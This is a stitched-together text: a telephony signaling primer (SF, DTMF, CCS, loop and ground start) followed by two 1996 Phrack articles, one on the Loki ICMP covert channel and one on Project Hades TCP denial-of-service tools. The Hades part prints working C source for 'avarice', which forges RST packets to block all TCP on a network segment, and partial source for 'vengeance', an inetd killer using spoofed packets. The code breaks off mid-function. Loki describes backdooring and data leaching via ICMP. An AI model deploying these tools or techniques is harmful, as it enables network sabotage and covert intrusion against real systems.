In-band signaling (300 to 3400 Hz) can take the form of either a single
frequency tone (SF signaling) of a combination of tones (Dual Tone
Multifrequency - DTMF).  DTMF is the familiar touch tone.

Out-of-band signaling (3400 to 3700 Hz)  is always single frequency
(SF).


In other words, using the frequency range from 300 to 3700 Hz, there are
three methods of signaling.

      Method A:       In-band (300 to 3400 Hz) by a single frequency
                      (SF)

      Method B:       In-band (300 to 3400 Hz) by multifrequencies
                      (DTMF)

      Method C:       Out-of-band (3400 to 3700 Hz) by a single
                      frequency (SF)


Single Frequency (SF) Signaling

Methods A and C are examples of Single Frequency (SF) signaling.  SF
signaling is used to determine if the phone line is busy (supervision)
and to convey dial pulses (addressing).

Method A:  In-band SF signaling uses a 2600 Hz tone which is carried
           over the frequency bandwidth of voice (remember the frequency
           bandwidth of voice is between 300 and 3300 Hz), within the
           speech path.  So as not to interfere with speech, it is
           present before the call but is removed once the circuit is
           seized and speech begins.  After the conversation is over, it
           may resume signaling.  It does not, however, signal during
           the call because it would interfere with voice which also may
           transmit at 2600 Hz.  Special equipment prevents occasional
           2600 Hz speech frequencies from accidentally setting off
           signals.

Method C:  To improve signaling performance, SF out-of-band signaling
           was developed.  It uses frequencies above the voice frequency
           range (within the 3400 to 3700 Hz bandwidth) to transmit
           signals.


The problem with Methods A and C is that they are easily susceptible to
fraud. In the late 1960s, one of the most popular breakfast cereals in
America had a promotion in which they packaged millions of children's
whistles, one in each specially marked box.  Never did General Mills,
the producer of the cereal, anticipate the fraud they would be party to.
It turned out that the whistles emitted a pure 2600 Hz tone, exactly the
tone used in Method A.  It did not take long for hackers to discover
that if they blew the whistles into the phones while making a long
distance phone call, it tricked the telephone company billing equipment
and no charge was made.

This trick grew into its own little cottage industry, culminating in the
infamous mass produced Blue Boxes which played tones that fooled
telephone billing equipment out of millions of dollars.


Method B:  DTMF was introduced to overcome this fraud, as well as to
           provide better signaling service to the customer.  Instead of
           producing just one signaling frequency, DTMF transmits
           numerical address information from a phone by sending a
           combination of two frequencies, one high and one low, to
           represent each number/letter and * and # on the dial pad.
           The usable tones are located in the center of the voice
           communication frequencies to minimize the effects of
           distortion.

Drawbacks to SF and DTMF Signaling

There are drawbacks to both SF and DTMF signaling that are promoting
their replacement in long distance toll circuits.  The most important is
that these signals consume time on the circuit while producing no
revenues.  Every electrical impulse, be it a voice conversation or
signaling information, consumes circuit time.  Voice conversations are
billable.  Signaling is not. Therefore, it is in the best interest of
the phone carriers to minimize signaling.

Unfortunately, almost half of all toll calls are not completed because
the called party is busy, not available or because of CO blockage.
Nevertheless, signals must be generated to attempt to set up, then take
down the call. Signals are generated but no revenue is produced.  For
incompleted calls, these signals compete with revenue producing signals
(whose calls were completed) for scarce circuit resources.


CCS introduced several benefits to the public network:

      .    Signaling information was removed from the voice channel, so
           control information could travel at the same time as voice
           without taking up valuable bandwidth from the voice channel.

      .    CCS sets up calls faster, reducing signaling time and freeing
           up scarce resources.

      .    It cost less than conventional signaling.

      .    It improves network performance.

      .    It reduces fraud.


Signaling System 7  (SS7)

Today the major long distance carriers use a version of CCS called
Signaling System 7  (SS7).  It is a standard protocol developed by the
CCITT, a body which establishes international standards.


Common Channel Signaling (CCS)

Common Channel Signaling (CCS) is a radical departure from traditional
signaling methods.  It transmits signals over a completely different
circuit than the voice information.  The signals from hundreds or
thousands of voice conversations are carried over a single common
channel.

Introduced in the mid-1970s CCS uses a separate signaling network to
transmit call setup, billing, and supervisory information.  Instead of
sending signals over the same communication paths as voice or data, CCS
employs a full network dedicated to signaling alone.

Loop Start Versus Ground Start Signaling

Establishing an electrical current connection with a CO can be done in
several different ways.  Here are a few of the possibilities


Loop Start

Inside of the CO, there is a powerful, central battery that provides
current to all subscribers.  Loop start is a method of establishing the
flow of current from the CO to a subscriber's phone.


The two main components of a loop start configuration are

      The tip (also called the A line) is the portion of the line loop
      between the CO and the subscriber's phone that is connected to the
      positive, grounded side of the battery.

      The ring (also called the B line) is the portion of the line loop
      between the CO and the subscriber's phone that is connected to the
      negative, ungrounded side of the battery.


To establish a loop start connection with the CO, a subscriber goes
off-hook. This closes a direct current (DC) path between the tip and
ring and allows the current to flow in a loop from the CO battery to the
subscriber and back to the battery.  Once the current is flowing, the CO
is capable of sending alerting signals (dial tone) to the subscriber to
begin a connection.

The problem with loop start signaling is a phenomenon called glare that
occurs in trunks between a CO and a PBX.  When a call comes into a PBX
from CO trunk, the only way the PBX knows that the trunk circuit is busy
is the ringing signal sent from the CO.

Unfortunately the ringing signal is transmitted at six second intervals.
For up to six seconds at a time, the PBX does not know there is a call
on that circuit.  If an internal PBX caller wishes to make an outgoing
call, the PBX may seize the busy trunk call at the same time.  The
result is confused users on either end of the line, and the abandonment
of both calls.

Ground Start 

Ground start signaling overcomes glare by immediately engaging a circuit
seize signal on the busy trunk.  The signal alerts the PBX that the
circuit is occupied with an incoming call and cannot be used for an
outgoing call.

Ground start is achieved by the CO by grounding the tip side of the line
immediately upon seizure by an incoming call.  The PBX detects the
grounded tip and is alerted not to seize this circuit for an outgoing
call, even before ringing begins.

Because ground start is so effective at overcoming glare, it is commonly
used in trunks between the CO and a PBX.


E & M

E & M signaling is used in tie lines which connect two private telephone
switches.  In E & M signaling, information is transmitted from one
switch to another over two pairs of wires.  Voice information is sent
over the first pair, just as it would be in a Loop Start or Ground Start
trunk.  However, instead of sending the signaling information over the
same pair of wires, it is sent over the second pair of wires.







--------------------------------------------------------------------------------


                             .oO Phrack Magazine Oo.

                          Volume Seven, Issue Forty-Nine
                                     
                                  File 06 of 16

			        [ Project Loki ]

		        whitepaper by daemon9 AKA route
		       sourcecode by daemon9 && alhambra
			     for Phrack Magazine
		      August 1996 Guild Productions, kid

	   comments to route@infonexus.com/alhambra@infonexus.com


		--[ Introduction ]--


	Ping traffic is ubiquitous to almost every TCP/IP based network and 
subnetwork.  It has a standard packet format recognized by every IP-speaking
router and is used universally for network management, testing, and 
measurement.  As such, many firewalls and networks consider ping traffic 
to be benign and will allow it to pass through, unmolested.  This project 
explores why that practice can be insecure.  Ignoring the obvious threat of 
the done-to-death denial of service attack, use of ping traffic can open up 
covert channels through the networks in which it is allowed.

	Loki, Norse God of deceit and trickery, the 'Lord of Misrule' was 
well known for his subversive behavior.  Inversion and reversal of all sorts 
was typical for him.  Due to it's clandestine nature, we chose to name this 
project after him.

	The Loki Project consists of a whitepaper covering this covert channel
in detail.  The sourcecode is not for distribution at this time.


		--[ Overview  ]--


	This whitepaper is intended as a complete description of the covert
channel that exists in networks that allow ping traffic (hereon referred to 
in the more general sense of ICMP_ECHO traffic --see below) to pass.  It is 
organized into sections:

	Section I.	ICMP Background Info and the Ping Program
	Section II.	Basic Firewall Theory and Covert Channels
	Section III.	The Loki Premise
	Section IV.	Discussion, Detection, and Prevention
	Section V.	References

(Note that readers unfamiliar with the TCP/IP protocol suite may wish to first
read ftp://ftp.infonexus.com/pub/Philes/NetTech/TCP-IP/tcipIp.intro.txt.gz)


		Section I.	ICMP Background Info and the Ping Program


	The Internet Control Message Protocol is an adjunct to the IP layer.
It is a connectionless protocol used to convey error messages and other 
information to unicast addresses.  ICMP packets are encapsulated inside of IP
datagrams.  The first 4-bytes of the header are same for every ICMP message, 
with the remainder of the header differing for different ICMP message types.
There are 15 different types of ICMP messages.  

	The ICMP types we are concerned with are type 0x0 and type 0x8.  
ICMP type 0x0 specifies an ICMP_ECHOREPLY (the response) and type 
0x8 indicates an ICMP_ECHO (the query).  The normal course of action is 
for a type 0x8 to elicit a type 0x0 response from a listening server.  
(Normally, this server is actually the OS kernel of the target host.  Most 
ICMP traffic is, by default, handled by the kernel).  This is what the ping 
program does.  

	Ping sends one or more ICMP_ECHO packets to a host.  The purpose
may just be to determine if a host is in fact alive (reachable).  ICMP_ECHO 
packets also have the option to include a data section.  This data section 
is used when the record route option is specified, or, the more common case, 
(usually the default) to store timing information to determine round-trip 
times.  (See the ping(8) man page for more information on these topics).  
An excerpt from the ping man page:

 "...An IP header without options is 20 bytes.  An ICMP ECHO_REQUEST packet
     contains an additional 8 bytes worth of ICMP header followed by an 
     arbitrary-amount of data.  When a packetsize is given, this indicated the
     size of this extra piece of data (the default is 56).  Thus the amount of
     data received inside of an IP packet of type ICMP ECHO_REPLY will always
     be 8 bytes more than the requested data space (the ICMP header)..."

	Although the payload is often timing information, there is no check by
any device as to the content of the data.  So, as it turns out, this amount of 
data can also be arbitrary in content as well.  Therein lies the covert 
channel.


		Section II.	Basic Firewall Theory and Covert Channels


	The basic tenet of firewall theory is simple:  To shield one network
from another.  This can be clarified further into 3 provisional rules:
1. All traffic passing between the two networks must pass through the firewall.
2. Only traffic authorized by the firewall may pass through (as dictated by 
the security policy of the site it protects).
3. The firewall itself is immune to compromise.	

	A covert channel is a vessel in which information can pass, but this
vessel is not ordinarily used for information exchange.  Therefore, as a 
matter of consequence, covert channels are impossible to detect and deter 
using a system's normal (read: unmodified) security policy.  In theory, 
almost any process or bit of data can be a covert channel.  In practice, it 
is usually quite difficult to elicit meaningful data from most covert 
channels in a timely fashion.  In the case of Loki, however, it is quite 
simple to exploit.

	A firewall, in it's most basic sense, seeks to preserve the security 
policy of the site it protects.  It does so by enforcing the 3 rules above.
Covert channels, however, by very definition, are not subject to a site's 
normal security policy.


		Section III.	The Loki Premise


	The concept of the Loki Project is simple: arbitrary information 
tunneling in the data portion of ICMP_ECHO and ICMP_ECHOREPLY packets.  Loki 
exploits the covert channel that exists inside of ICMP_ECHO traffic.  This 
channel exists because network devices do not filter the contents of ICMP_ECHO
traffic.  They simply pass them, drop them, or return them. The trojan packets
themselves are masqueraded as common ICMP_ECHO traffic.  We can encapsulate 
(tunnel) any information we want.  From here on out, Loki traffic will refer 
to ICMP_ECHO traffic that tunnels information.  (Astute readers will note that
Loki is simply a form of steganography).

	Loki is not a compromise tool.  It has many uses, none of which are 
breaking into a machine.  It can be used as a backdoor into a system by 
providing a covert method of getting commands executed on a target machine.
It can be used as a way of clandestinely leeching information off of a 
machine.  It can be used as a covert method of user-machine or user-user 
communication.  In essence the channel is simply a way to secretly shuffle
data (confidentiality and authenticity can be added by way of cryptography). 

	Loki is touted as a firewall subversion technique, but in reality it
is simple a vessel to covertly move data.  *Through* exactly what we move this
data is not so much an issue, as long as it passes ICMP_ECHO traffic.  It does
not matter: routers, firewalls, packet-filters, dual-homed hosts, etc...  all
can serve as conduits for Loki.


		Section IV.	Discussion, Detection and Prevention


	If ICMP_ECHO traffic is allowed, then this channel exists.  If this 
channel exists, then it is unbeatable for a backdoor (once the system is 
compromised).  Even with extensive firewalling and packet-filtering 
mechanisms in place, this channel continues to exist (provided, of course,
they do not deny the passing of ICMP_ECHO traffic).  With a proper 
implementation, the channel can go completely undetected for the duration of
its existence.  

	Detection can be difficult.  If you know what to look for, you may
find that the channel is being used on your system.  However, knowing when
to look, where to look, and the mere fact that you *should* be looking all
have to be in place.  A surplus of ICMP_ECHOREPLY packets with a garbled
payload can be ready indication the channel is in use.  The standalone Loki 
server program can also be a dead give-away.  However, if the attacker can 
keep traffic on the channel down to a minimum, and was to hide the Loki 
server *inside* the kernel, detection suddenly becomes much more difficult.

	Disruption of this channel is simply preventative.  Disallow ICMP_ECHO
traffic entirely.  ICMP_ECHO traffic, when weighed against the security 
liabilities it imposes, is simply not *that* necessary.  Restricting ICMP_ECHO
traffic to be accepted from trusted hosts only is ludicrous with a 
connectionless protocol such as ICMP.  Forged traffic can still reach the 
target host.  The LOKI packet with a forged source IP address will arrive at 
the target (and will elicit a legitimate ICMP_ECHOREPLY, which will 
travel to the spoofed host, and will be subsequently dropped silently) and 
can contain the 4-byte IP address of the desired target of the Loki response 
packets, as well as 51-bytes of malevolent data...  While the possibility 
exists for a smart packet filter to check the payload field and ensure that 
it *only* contains legal information, such a filter for ICMP is not in wide 
usage, and could still be open to fooling.  The only sure way to destroy this
channel is to deny ALL ICMP_ECHO traffic into your network.

NOTE: This channel exists in many other protocols.  Loki Simply covers 
ICMP, but in theory (and practice) any protocol is vulnerable to covert 
data tunneling.  All that is required is the ingenuity...

		Section V.	References


		Books:	TCP Illustrated vols. I, II, III
		RFCs:	rfc 792
		Source:	Loki v1.0
		Ppl:	We did not pioneer this concept  To our knowledge, 
		it was discovered independently of our efforts, prior to our
		research.  This party wishes to remain aloof.


This project made possible by a grant from the Guild Corporation.


EOF


--------------------------------------------------------------------------------


                             .oO Phrack Magazine Oo.

                          Volume Seven, Issue Forty-Nine

                                  File 07 of 16

			        [ Project Hades ]

		           Paper by daemon9 AKA route
		              sourcecode by daemon9
			       for Phrack Magazine
		      October 1996 Guild Productions, kid

	   		comments to route@infonexus.com


		--[ Introduction ]--


	More explorations of weaknesses in the most widely used transport
protocol on the Internet.  Put your mind at rest fearful reader!  The 
vulnerabilities outlined here are nowhere near the devastating nature of 
Project Neptune/Poseidon.  

	Hades is the Greek god of the underworld; his kingdom is that of the 
the Dead.  Hades renown for being quite evil and twisted.  He is also well
known for his TCP exploit code.  Therefore, it seemed fitting to name this
project after him.

	BTW, for this code to work (as with much of my previous code) your 
kernel must be patched to be able to spoof packets.  DO NOT MAIL ME to ask how 
to do it.


		--[ Overview  ]--


	Section I.	Ethernet background information	
	Section II.	TCP background information
	Section III.	Avarice
	Section IV.	Vengeance
	Section V.	Sloth
	Section	VI.	Discussion, Detection, and Prevention

(Note that readers unfamiliar with the TCP/IP protocol suite may wish to first
read ftp://ftp.infonexus.com/pub/Philes/NetTech/TCP-IP/tcipIp.intro.txt.gz)


		Section I.	Ethernet Background information


	Ethernet is a multi-drop, connectionless, unreliable link layer 
protocol.  It (IEEE 802.3 Ethernet is the version I refer to) is the 
link-layer protocol most LANs are based upon.  It is multidrop; each
device on the ethernet shares the media (and, consequently, the bandwidth)
with every other device.  It is connectionless; every frame is sent 
independently of the previous one and next one.  It is unreliable; frames are 
not acknowledged by the other end.  If a frame is received that doesn't pass 
the checksum, it is silently discarded.  It is a link-layer protocol that sits
underneath the network protocol (IP) and above the physical interface (varies,
but often CAT3/5 UTP).


                --[ Signaling and Encoding ]--
		

	Standard 802.3 Ethernet signals at 10 mega-bits per second using 
Manchester encoding to order bits on the wire.  Manchester is a biphase 
state-transition technique; to indicate a particular bit is on, a voltage 
transition from low to high is used.  To indicate a bit is off, a high to low
transition is used.  


                --[ Media Access ]--


	Ethernet uses media contention to gain access to the shared wire.  The
version of contention it uses is CSMA/CD (carrier sense multiple access / 
collision detection).  This simply means that ethernet supports multiple 
devices on a shared network medium.  Any device can send it's data whenever
it thinks the wire is clear.  Collisions are detected (causing back-off and
retry) but not avoided.  CSMA/CD algorithmically:

1. IF: 	 the medium is idle -> transmit.
2. ELSE: the medium is busy -> wait and listen until idle -> transmit.
3. IF:	 collision is detected -> transmit jamming signal, cease all 
	 transmission
4. IF:	 jamming signal is detected -> wait a random amount of time, goto 1
	

		--[ Broadcast Medium ]--


	Since it is CSMA/CD technology, ethernet has the wonderful property
that it hears everything on the network.  Under normal circumstances, an
ethernet NIC will only capture and pass to the network layer packets that 
boast it's own MAC (link-layer) address or a broadcast MAC address.  However, 
it is trivial to place an Ethernet card into promiscuous mode where it will
capture everything it hears, regardless to whom the frame was addressed.

	It bears mentioning that bridges are used to divide an ethernet into
logically separate segments.  A bridge (or bridging device such as a smart 
hub) will not pass an ethernet frame from segment to segment unless the 
addressed host lies on the disparate segment.  This can reduce over-all 
network load by reducing the amount of traffic on the wire.


                Section II.      TCP Background Information


        TCP is a connection-oriented, reliable transport protocol.  TCP is
responsible for hiding network intricacies from the upper layers.  A 
connection-oriented protocol implies that the two hosts participating in a 
discussion must first establish a connection before data may be exchanged.  In
TCP's case, this is done with the three-way handshake.  Reliability can be 
provided in a number of ways, but the only two we are concerned with are data 
sequencing and acknowledgment.  TCP assigns sequence numbers to every byte in
every segment and acknowledges all data bytes received from the other end.  
(ACK's consume a sequence number, but are not themselves ACK'd.  That would be
ludicrous.)  


                --[ TCP Connection Establishment ]--


        In order to exchange data using TCP, hosts must establish a connection.
TCP establishes a connection in a 3 step process called the 3-way handshake.
If machine A is running a client program and wishes to connect to a server
program on machine B, the process is as follows:

                        fig(1)
       
        1       A       ---SYN--->      B       

        2       A    <---SYN/ACK---     B

        3       A       ---ACK--->      B

                                
        At (1) the client is telling the server that it wants a connection.
This is the SYN flag's only purpose.  The client is telling the server that 
the sequence number field is valid, and should be checked.  The client will 
set the sequence number field in the TCP header to it's ISN (initial sequence
number).  The server, upon receiving this segment (2) will respond with it's 
own ISN (therefore the SYN flag is on) and an Acknowledgment of the clients 
first segment (which is the client's ISN+1).  The client then ACK's the 
server's ISN (3).  Now data transfer may take place.


              --[ TCP Control Flags  ]--


        There are six TCP control flags. 

SYN:   Synchronize Sequence Numbers
        The synchronize sequence numbers field is valid.  This flag is only 
valid during the 3-way handshake.  It tells the receiving TCP to check the 
sequence number field, and note it's value as the connection-initiator's 
(usually the client) initial sequence number.  TCP sequence numbers can 
simply be thought of as 32-bit counters.  They range from 0 to 4,294,967,295.
Every byte of data exchanged across a TCP connection (along with certain 
flags) is sequenced.  The sequence number field in the TCP header will contain
the sequence number of the *first* byte of data in the TCP segment.  

ACK:   Acknowledgment
        The acknowledgment number field is valid.  This flag is almost always
set.   The acknowledgment number field in the TCP header holds the value of 
the next *expected* sequence number (from the other side), and also 
acknowledges *all* data (from the other side) up through this ACK number minus
one.

RST:   Reset
        Destroy the referenced connection.  All memory structures are torn 
down.

URG:    Urgent 
        The urgent pointer is valid.  This is TCP's way of implementing out
of band (OOB) data.  For instance, in a telnet connection a `ctrl-c` on the 
client side is considered urgent and will cause this flag to be set. 

PSH:    Push
        The receiving TCP should not queue this data, but rather pass it to 
the application as soon as possible.  This flag should always be set in 
interactive connections, such as telnet and rlogin.

FIN:    Finish 
        The sending TCP is finished transmitting data, but is still open to 
accepting data.


                --[ Ports ]--

       
        To grant simultaneous access to the TCP module, TCP provides a user 
interface called a port.  Ports are used by the kernel to identify network 
processes.  They are strictly transport layer entities.  Together with an 
IP address, a TCP port provides an endpoint for network communications.  In 
fact, at any given moment *all* Internet connections can be described by 4 
numbers: the source IP address and source port and the destination IP 
address and destination port.  Servers are bound to 'well-known' ports so 
that they may be located on a standard port on different systems.  
For example, the telnet daemon sits on TCP port 23.
        

		Section III.	Avarice
	

	Avarice is a SYN,RST generator.  It is designed to disallow any
TCP traffic on the ethernet segment upon which it listens.  It works by
listening for the 3-way handshake procedure to begin, and then immediately 
resetting it.  The result is that no TCP based connections can be negotiated, 
and therefore no TCP traffic can flow.  This version sits on a host, puts the 
NIC into promiscuous mode and listens for connection-establishment requests.
When it hears one, it immediately generates a forged RST packet and sends it 
back to the client.  If the forged RST arrives in time, the client will quit 
with a message like:

	telnet: Unable to connect to remote host: Connection refused

For the client to accept the RST, it must think it is an actual response from
the server.  This requires 3 pieces of information: IP address, TCP port, and 
TCP acknowledgment number.  All of this information is gleaned from the 
original SYN packet:  the IP address of the destination host, the TCP port 
of the listening process, and the clients ISN (the acknowledgment number in 
the RST packet is the clients ISN+1, as SYN's consume a sequence number).

	This program has a wide range of effectiveness.  Speed is essential
for avarice to quell all TCP traffic on a segment.  We are basically racing 
the kernel.  OS kernels tend to be rather efficient at building packets.  If 
run on a fast machine, with a fast kernel, it's kill rate is rather high.  
I have seen kill-rates as high as 98% (occasionally a few slip through) on 
a fast machine.  Consequently, if run on a slow machine, with a slow kernel, it
will likely be useless.  If the RSTs arrive too late, they will be dropped by 
the client, as the ACK number will be too low for the referenced connection.  
Sure, the program could send, say, 10 packets, each with progressively higher 
ACK numbers, but hey, this is a lame program...


		Section IV.	Vengeance


	Vengeance is an inetd killer.  On affected systems this program will
cause inetd to become unstable and die after the next connection attempt.
It sends a connection-request immediately followed by a RST to an internal 
inetd managed service, such as time or daytime.  Inetd is now unstable and
will die after the next attempt at a connection.  Simple.  Dumb.  Not eleet.
(This inetd bug should be fixed or simply not present in newer inetd code.) 

	I did not add code to make the legitimate connection that would kill
inetd to this simple little program for 2 reasons.  1) It's simply not worth 
the complexity to add sequence number prediction to create a spoofed 3-way 
handshake.  This program is too dinky.  2) Maybe the attacker would want 
to leave inetd in a unstable state and let some legitimate user come along and
kill it.  Who knows.  Who cares.  Blah.  I wash my hands of the whole affair.


		Section V.	Sloth


	"Make your ethernet feel like a lagged 28.8 modem link!"

	Sloth is an experiment.  It is an experiment in just how lame IP 
spoofing can get.  It works much the same way avarice does, except it sends 
forged TCP window advertisements.  By default Sloth will spoof zero-size 
window advertisements which will have the effect of slowing interactive 
traffic considerably.  In fact, in some instances, it will freeze a 
connection all together.  This is because when a TCP receives a zero-size 
window advertisement, it will stop sending data, and start sending window 
probes (a window probe is nothing more than an ACK with one byte of 
data) to see if the window size has increased.  Since window probes are, in 
essence, nothing more than acknowledgements, they can get lost.  Because of 
this fact, TCP implements a timer to cordinate the repeated sending of these 
packets.  Window probes are sent according to the persist timer (a 500ms 
timer) which is calculated by TCP's exponential backoff algorithm.  Sloth 
will see each window probe, and spoof a 0-size window to the sender.  This 
all works out to cause mass mayhem, and makes it difficult for either TCP to 
carry on a legitimate conversation.  

	Sloth, like avarice, is only effective on faster machines.  It also
only works well with interactive traffic.

		
		Section	VI.	Discussion, Detection, and Prevention


	Avarice is simply a nasty program.  What more do you want from me?
Detection?  Detection would require an ounce of clue.  Do FTP, SMTP, HTTP, 
POP, telnet, etc all suddenly break at the same time on every machine on 
the LAN?  Could be this program.  Break out the sniffer.  Monitor the network 
and look for the machine that generating the RSTs.  This version of the program
does not spoof its MAC address, so look for that.  To really prevent this 
attack, add cryptographic authentication to the TCP kernels on your machines.

	Vengeance is a wake-up call.  If you haven't patched your inetd to be
resistant to this attack, you should now.  If your vendor hasn't been 
forthcoming with a patch, they should now.  Detection is using this 
program.  Prevention is a patch.  Prevention is disabling the internal inetd 
services.

	Sloth can be detected and dealt with in much the same way as avarice.

	You may have noticed that these programs are named after three of
the Seven Deadly Sins.  You may be wondering if that implies that there will 
be four more programs of similar ilk.  Well, STOP WONDERING.  The answer is 
NO.  I am officially *out* of the D.O.S. business.  I am now putting my efforts
towards more productive ventures.  Next issue, a session jacker.


This project made possible by a grant from the Guild Corporation.


-------------------------------8<-------cut-me-loose--------------------------


/*
                            The Hades Project
		    Explorations in the Weakness of TCP
			   SYN -> RST generator
			        (avarice)
                                 v. 1.0

                        daemon9/route/infinity

                     October 1996 Guild productions

                     comments to route@infonexus.com


   This coding project made possible by a grant from the Guild corporation

*/

#include "lnw.h"

void main(){

	void reset(struct iphdr *,struct tcphdr *,int);

	struct epack{				/* Generic Ethernet packet w/o data payload */
		struct ethhdr eth;		/* Ethernet Header */
		struct iphdr ip;		/* IP header */
		struct tcphdr tcp;		/* TCP header */
	}epack;

	int sock,shoe,dlen;
	struct sockaddr dest;
	struct iphdr  *iphp;
	struct tcphdr *tcphp;

	if(geteuid()||getuid()){
                fprintf(stderr,"UID or EUID of 0 needed...
");
                exit(0);
        }
	sock=tap(DEVICE);		/* Setup the socket and device */

				/* Could use the SOCK_PACKET but building Ethernet headers would
				 require more time overhead; the kernel can do it quicker then me */
	if((shoe=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
                perror("
Hmmm.... socket problems");
                exit(1);
        }  
	shadow();			/* Run as a daemon */ 
	
	iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);
  	tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);   

   	/* Network reading loop / RSTing portion */
	while(1)if(recvfrom(sock,&epack,sizeof(epack),0,&dest,&dlen))if(iphp->protocol==IPPROTO_TCP&&tcphp->syn)reset(iphp,tcphp,shoe);
}


/*
 *	Build a packet and send it off.
 */

void reset(iphp,tcphp,shoe)
struct iphdr *iphp;
struct tcphdr *tcphp;
int shoe;
{
   	
	void dump(struct iphdr *,struct tcphdr *);
        
        struct tpack{			/* Generic TCP packet w/o payload */
                struct iphdr ip;	
                struct tcphdr tcp;
        }tpack;                
        
        struct pseudo_header{           /* For TCP header checksum */
                unsigned source_address;
                unsigned dest_address;
                unsigned char placeholder;
                unsigned char protocol;
                unsigned short tcp_length;
                struct tcphdr tcp;
        }pheader;
  
   	struct sockaddr_in sin;         /* IP address information */
                        		/* Setup the sin struct with addressing information */
      	sin.sin_family=AF_INET;  	/* Internet address family */
        sin.sin_port=tcphp->dest;       /* Source port */
        sin.sin_addr.s_addr=iphp->saddr;/* Dest. address */

                        /* Packet assembly begins here */
        
                                /* Fill in all the TCP header information */

        tpack.tcp.source=tcphp->dest;   /* 16-bit Source port number */
        tpack.tcp.dest=tcphp->source;   /* 16-bit Destination port */
        tpack.tcp.seq=0;        	/* 32-bit Sequence Number */
        tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1);    /* 32-bit Acknowledgement Number */
        tpack.tcp.doff=5;              	/* Data offset */
        tpack.tcp.res1=0;              	/* reserved */
        tpack.tcp.res2=0;              	/* reserved */
      	tpack.tcp.urg=0;               	/* Urgent offset valid flag */
        tpack.tcp.ack=1;               	/* Acknowledgement field valid flag */
        tpack.tcp.psh=0;               	/* Push flag */
        tpack.tcp.rst=1;               	/* Reset flag */
        tpack.tcp.syn=0;               	/* Synchronize sequence numbers flag */
        tpack.tcp.fin=0;               	/* Finish sending flag */
        tpack.tcp.window=0;	 	/* 16-bit Window size */
        tpack.tcp.check=0;             	/* 16-bit checksum (to be filled in below) */
        tpack.tcp.urg_ptr=0;           	/* 16-bit urgent offset */
        
                                /* Fill in all the IP header information */
        
        tpack.ip.version=4;            	/* 4-bit Version */
        tpack.ip.ihl=5;                	/* 4-bit Header Length */
        tpack.ip.tos=0;                	/* 8-bit Type of service */
    	tpack.ip.tot_len=htons(IPHDR+TCPHDR);  /* 16-bit Total length */
        tpack.ip.id=0;         		/* 16-bit ID field */
        tpack.ip.frag_off=0;           	/* 13-bit Fragment offset */
        tpack.ip.ttl=64;	        /* 8-bit Time To Live */
        tpack.ip.protocol=IPPROTO_TCP; 	/* 8-bit Protocol */
        tpack.ip.check=0;              	/* 16-bit Header checksum (filled in below) */
        tpack.ip.saddr=iphp->daddr;    	/* 32-bit Source Address */
        tpack.ip.daddr=iphp->saddr;    	/* 32-bit Destination Address */
        
        pheader.source_address=(unsigned)tpack.ip.saddr;
        pheader.dest_address=(unsigned)tpack.ip.daddr;
        pheader.placeholder=0;
     	pheader.protocol=IPPROTO_TCP;
        pheader.tcp_length=htons(TCPHDR);
        
     			/* IP header checksum */
        
      	tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR);
                
			/* TCP header checksum */
                                
        bcopy((char *)&tpack.tcp,(char *)&pheader.tcp,TCPHDR);
       	tpack.tcp.check=in_cksum((unsigned short *)&pheader,TCPHDR+12);

	sendto(shoe,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
#ifndef QUIET
	dump(iphp,tcphp);
#endif
}

/* 
 *	Dumps some info...
 */

void dump(iphp,tcphp)
struct iphdr *iphp;
struct tcphdr *tcphp;
{
	fprintf(stdout,"Connection-establishment Attempt: ");
   	fprintf(stdout,"%s [%d] --> %s [%d]
",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest)); 
	fprintf(stdout,"Thwarting...
");
}

-------------------------------8<-------cut-me-loose--------------------------

/*
                            The Hades Project
                    Explorations in the Weakness of TCP
                              Inetd Killer
			       (vengance)
                                 v. 1.0

                        daemon9/route/infinity

                     October 1996 Guild productions

                     comments to route@infonexus.com


   This coding project made possible by a grant from the Guild corporation
*/


#include "lnw.h"

void main()
{

	void s3nd(int,int,unsigned,unsigned short,unsigned);
	void usage(char *);
	unsigned nameResolve(char *);	

	int sock,mode,i=0;
	char buf[BUFSIZE];
	unsigned short port;
	unsigned target=0,source=0;
     	char werd[]={"



Hades is a Guild Corporation Production.  c.1996

"}; 

	if(geteuid()||getuid()){
                fprintf(stderr,"UID or EUID of 0 needed...
");
                exit(0);
        }

	if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
                perror("
Hmmm.... socket problems");
                exit(1);
        }  

	printf(werd);

	printf("
Enter target address-> ");
        fgets(buf,sizeof(buf)-1,stdin);
	if(!buf[1])exit(0);
        while(buf[i]!='
')i++;                 /* Strip the newline */
        buf[i]=0;
	target=nameResolve(buf);
        bzero((char *)buf,sizeof(buf));

	printf("
Enter source address to spoof-> ");
        fgets(buf,sizeof(buf)-1,stdin);
	if(!buf[1])exit(0);        
	while(buf[i]!='
')i++;                 /* Strip the newline */
        buf[i]=0;
	source=nameResolve(buf);
        bzero((char *)buf,sizeof(buf));

	printf("
Enter target port (should be 13, 37, or some internal service)-> ");
        fgets(buf,sizeof(buf)-1,stdin);
        if(!buf[1])exit(0);
	port=(unsigned short)atoi(buf);
    
	fprintf(stderr,"Attempting to upset inetd...

");

	s3nd(sock,0,target,port,source);	/* SYN */
	s3nd(sock,1,target,port,source);	/* RST */

	fprintf(stderr,"At this point, if the host is vulnerable, inetd is unstable.
To verfiy: `telnet target.com {internal service port #}`.  Do this twice.
Inetd should allow the first connection, but send no data, then die.
The second telnet will verify t







his.
"); 
}

/*
 *	Build a packet and send it off.
 */

void s3nd(int sock,int mode,unsigned target,unsigned short port,unsigned source){
   	
        struct pkt{
                struct iphdr ip;
                struct tcphdr tcp;
        }packet;                
        
        struct pseudo_header{           /* For TCP header checksum */
                unsigned source_address;
                unsigned dest_address;
                unsigned char placeholder;
                unsigned char protocol;
                unsigned short tcp_length;
                struct tcphdr tcp;
        }pseudo_header;
  
   	struct sockaddr_in sin;         /* IP address information */
                        		/* Setup the sin struct with addressing information */
      	sin.sin_family=AF_INET;  	/* Internet address family */
        sin.sin_port=666;       	/* Source port */
        sin.sin_addr.s_addr=target;  	/* Dest. address */

